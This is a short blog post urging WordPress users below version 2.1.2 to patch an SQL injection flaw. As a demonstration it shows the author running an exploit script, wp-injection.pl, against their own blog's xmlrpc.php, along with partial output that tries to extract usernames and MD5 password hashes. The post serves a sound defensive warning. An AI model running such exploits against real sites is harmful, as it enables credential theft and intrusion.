WordPress 2.1.2 SQL Injection Vulnerabilities

Written by · in Systems

If you are running WordPress below version 2.1.2, patch it immediately, it leads to SQL Injection Vulnerabilities. Here is my test before patch.


wp-injection.pl http://www.takizo.com/blog/xmlrpc.php xxxxx xxxxx 10

The usage is correct
[*] Trying Host http://www.takizo.com/blog/xmlrpc.php ...
[+] The xmlrpc server seems to be working
--------------------
Username for id = 1 is:--> 3
AN
Md5 hash for user: 3
AN
is: 3
AND post_id = 10 union al
--------------------
Username for id = 2 is:--> 3
AN
Md5 hash for user: 3
AN
is: 3
AND post_id = 10 union al

Of course there are more I didn’t show la, just patch it! If you are lazy, this fellow can help you do it for free.